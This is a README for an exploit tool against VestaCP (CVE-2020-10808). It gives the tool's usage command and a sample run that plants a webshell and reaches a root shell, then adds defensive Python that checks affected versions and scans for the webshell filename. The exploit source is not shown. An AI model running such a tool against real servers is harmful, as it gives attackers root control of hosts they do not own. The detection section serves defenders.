CVE: CVE-2020-10808
Based on: rekter0/vestaROOT
Advisory: SSD Disclosure - VestaCP Multiple Vulnerabilities
This exploit targets multiple vulnerabilities in Vesta Control Panel (VestaCP) that allow an authenticated user to achieve root-level command execution through mailbox forwarding injection and cron job abuse.
- Authenticated RCE to root privileges
- Automatic webshell deployment (`ownwebshell.php`)
- Interactive command execution loop
- Standalone implementation - no external dependencies
- Automatic domain and mailbox creation

```
python3 vesta-rce-exploit.py https://<target>:8083 <username> <password>
```

Note: Use HTTPS protocol for port 8083 connections.

```
$ python3 vesta-rce-exploit.py https://192.168.1.100:8083 admin password123
[INFO] Attempting login to https://192.168.1.100:8083 as admin
[+] Logged in as admin
[INFO] Checking for existing webshell or creating one
[+] Webshell uploaded
[INFO] Creating mailbox on domain abc123.poc
[+] Mail account created
[INFO] Deploying backdoor via mailbox editing
[+] Root shell possibly obtained. Enter commands:
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
```

- Valid user credentials for VestaCP
- Python 3.x
- Target running VestaCP ≤ 0.9.8-26
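
For defenders, the following added example (not part of this repository or of the original advisory) checks a version string against the affected range stated above and walks a directory tree for the two artifacts visible on this page: a file named `ownwebshell.php` and a domain directory ending in `.poc`. The `.poc` suffix is an assumption taken from the sample run, and the directory layout built by `build_sample_tree` is constructed for the demonstration; point `find_indicators` at your own web root.

```python
import os
import re
import tempfile

LAST_AFFECTED = (0, 9, 8, 26)      # "VestaCP <= 0.9.8-26", as stated on this page
WEBSHELL_NAME = "ownwebshell.php"  # file name this page says the tool deploys
POC_SUFFIX = ".poc"                # assumption: from the sample run's abc123.poc

def parse_version(text):
    """Turn '0.9.8-26' into (0, 9, 8, 26); raise ValueError on anything else."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*(-\d+)?", text):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in re.split(r"[.-]", text))

def is_affected(version_text):
    """True when the version is at or below the last affected release."""
    v = parse_version(version_text)
    # Pad so '0.9.8' compares as 0.9.8-0 instead of as a shorter tuple.
    v += (0,) * (len(LAST_AFFECTED) - len(v))
    return v <= LAST_AFFECTED

def find_indicators(root):
    """Walk root and return sorted (kind, path relative to root) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            if name.lower().endswith(POC_SUFFIX):
                full = os.path.join(dirpath, name)
                findings.append(("poc-domain-dir", os.path.relpath(full, root)))
        for name in filenames:
            if name.lower() == WEBSHELL_NAME:
                full = os.path.join(dirpath, name)
                findings.append(("webshell-name", os.path.relpath(full, root)))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample data: one clean site and one with both artifacts."""
    root = tempfile.mkdtemp(prefix="vesta-triage-")
    clean = os.path.join(root, "bob", "web", "example.org", "public_html")
    dirty = os.path.join(root, "alice", "web", "abc123.poc", "public_html")
    for path, filename in ((clean, "index.php"), (dirty, WEBSHELL_NAME)):
        os.makedirs(path)
        open(os.path.join(path, filename), "w").close()
    return root

if __name__ == "__main__":
    print("0.9.8-26 affected:", is_affected("0.9.8-26"))
    for kind, path in find_indicators(build_sample_tree()):
        print(kind, path)
```

A match on either indicator is a lead for review rather than proof of compromise, since both names can be changed.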
This tool is provided for educational purposes and authorized security testing only. Unauthorized access to systems you do not own or have explicit permission to test is illegal and unethical. Use responsibly and in compliance with applicable laws and regulations.